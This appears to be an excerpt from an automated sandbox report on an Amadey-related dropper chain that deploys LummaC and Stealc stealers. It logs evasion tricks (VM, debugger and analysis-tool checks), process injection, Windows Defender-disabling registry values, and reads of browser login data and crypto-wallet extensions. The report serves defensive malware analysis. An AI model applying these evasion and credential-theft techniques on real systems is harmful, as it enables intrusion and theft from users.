Source: firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: firefox.exe, 0000001F.00000002.2950099066.000001D14E63A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2956647338.000000000122A000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2980852938.000001DEE03BB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: firefox.exe, 00000021.00000002.2953748546.000001729E3E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]gha
Source: firefox.exe, 0000001C.00000002.2997922183.000001DEEA4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2967474510.000001C8C3C1B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: skotes.exe, 00000006.00000002.2957851747.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 98a7b9f337.exe, 00000022.00000002.2946404134.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: file.exe, 00000000.00000002.1711690435.00000000008FB000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1729072200.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1741802385.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, a6f0d09f38.exe, 0000000D.00000002.2942271609.00000000007E2000.00000040.00000001.01000000.0000000E.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987765650.000000000655D000.00000040.00000800.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2641791818.000000000069B000.00000040.00000001.01000000.0000000F.sdmp, 8b82d73f70.exe, 00000020.00000002.2916077534.000000000052D000.00000040.00000001.01000000.0000001A.sdmp, 98a7b9f337.exe, 00000022.00000002.2962320417.000000000174F000.00000040.00000001.01000000.0000001B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001C.00000002.2980852938.000001DEE03B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_050F0D2C rdtsc

0_2_050F0D2C

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0071652B mov eax, dword ptr fs:[00000030h]		6_2_0071652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0071A302 mov eax, dword ptr fs:[00000030h]		6_2_0071A302

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4FB5008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: GProgram Manager
Source: firefox.exe, 0000001C.00000002.2958480924.000000351FFFB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?Progman
Source: firefox.exe, 0000001C.00000003.2809549596.000001DEFB06B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hSoftware\Policies\Microsoft\Windows\PersonalizationNoChangingStartMenuBackgroundPersonalColors_BackgroundWilStaging_02RtlDisownModuleHeapAllocationRtlQueryFeatureConfigurationRtlRegisterFeatureConfigurationChangeNotificationRtlSubscribeWnfStateChangeNotificationRtlDllShutdownInProgressntdll.dllNtQueryWnfStateDataLocal\SM0:%d:%d:%hs_p0Local\SessionImmersiveColorPreferenceBEGINTHMthmfile\Sessions\%d\Windows\ThemeSectionMessageWindowendthemewndThemeApiConnectionRequest\ThemeApiPortwinsta0SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\PersonalizeAppsUseLightThemeSystemUsesLightThemedefaultshell\themes\uxtheme\render.cppCompositedWindow::WindowdeletedrcacheMDIClientSoftware\Microsoft\Windows\DWMColorPrevalenceSoftware\Microsoft\Windows\CurrentVersion\ImmersiveShellTabletModeMENUAccentColorSoftware\Microsoft\Windows\CurrentVersion\Explorer\AccentDefaultStartColorControl Panel\DesktopAutoColorizationAccentColorMenuStartColorMenuAutoColorSoftware\Microsoft\Windows\CurrentVersion\Themes\History\ColorsSoftware\Microsoft\Windows\CurrentVersion\Themes\HistoryAccentPaletteTab$Shell_TrayWndLocal\SessionImmersiveColorMutex

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_006FD3E2 cpuid

6_2_006FD3E2

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_006FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_006FCBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_006E65E0 LookupAccountNameA,

6_2_006E65E0

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682431214.0000000005B91000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681603974.0000000005B91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 6.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2306646203.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1741706182.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1688680503.0000000004860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1729011202.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1671498988.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711619647.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match	File source: 0000000F.00000003.2670852779.0000000001953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6e1fbaaba5.exe PID: 7984, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0000000E.00000002.2641325721.00000000002C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2600123548.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
